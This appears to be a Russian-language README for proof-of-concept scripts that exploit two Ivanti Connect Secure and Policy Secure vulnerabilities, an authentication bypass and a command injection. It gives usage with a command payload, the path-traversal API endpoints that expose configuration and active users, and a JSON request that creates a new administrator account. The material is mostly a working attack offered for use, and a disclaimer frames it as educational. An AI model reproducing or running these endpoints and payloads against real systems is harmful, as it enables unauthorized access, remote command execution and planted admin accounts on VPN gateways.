
Уязвимость обхода аутентификации в веб-компоненте Ivanti ICS 9.x, 22.x и Ivanti Policy Secure позволяет удалённому злоумышленнику получить доступ к ограниченным ресурсам, обходя проверки контроля доступа.
Уязвимость обхода аутентификации в веб-компоненте Ivanti ICS 9.x, 22.x и Ivanti Policy Secure позволяет удалённому злоумышленнику получить доступ к ограниченным ресурсам, обходя проверки контроля доступа.
использование: ./CVE-2023-46805.sh http(s)://fqdn:port
./CVE-2023-46805.sh https://my.vpn.ip:443

примечания:
chmod +x CVE-2023-46805.sh
требуются приложения curl + json_pp
результат: если система уязвима, вы должны увидеть некоторые данные:

Уязвимость внедрения команд в веб-компонентах Ivanti Connect Secure (9.x, 22.x) и Ivanti Policy Secure позволяет аутентифицированному администратору отправлять специально созданные запросы и выполнять произвольные команды на устройстве.
использование: ./CVE-2024-21887.sh http(s)://fqdn:port payload_cmd
./CVE-2024-21887.sh https://my.vpn.ip:443 "touch /tmp/pwned"
результат: если система уязвима, вы должны увидеть некоторые данные, и ваша полезная нагрузка должна сработать:

примечания:
chmod +x CVE-2024-21887.sh
требуются приложения curl, xxd, tr и sed
/api/v1/totp/user-backup-code/../../configuration/system/configuration /api/v1/totp/user-backup-code/../../system/active-users
/api/v1/totp/user-backup-code/../../configuration/administrators/admin-realms/realm/Admin%20Users
-H 'Content-Type:application/json' -d '{"change-password-at-signin": "false", "consoleaccess": "false", "enabled": "true", "fullname": "new user", "one-timeuse": "false", "password-cleartext": "new_password", "username": "login_user"}'
Обходной путь/Исправление: https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US
Благодарности: https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis
больше обо мне ;) https://www.linkedin.com/in/duy-huan-bui/
⚠️ Отказ от ответственности: ВАЖНО: Этот скрипт предоставлен ТОЛЬКО для образовательных целей, этического тестирования и законного использования. Не используйте его в любой системе или сети без явного разрешения. Несанкционированный доступ к компьютерным системам и сетям незаконен, и пользователи, уличенные в несанкционированной деятельности, подлежат привлечению к ответственности. Автор НЕ несёт ответственности за любой ущерб, причинённый неправомерным использованием этого скрипта.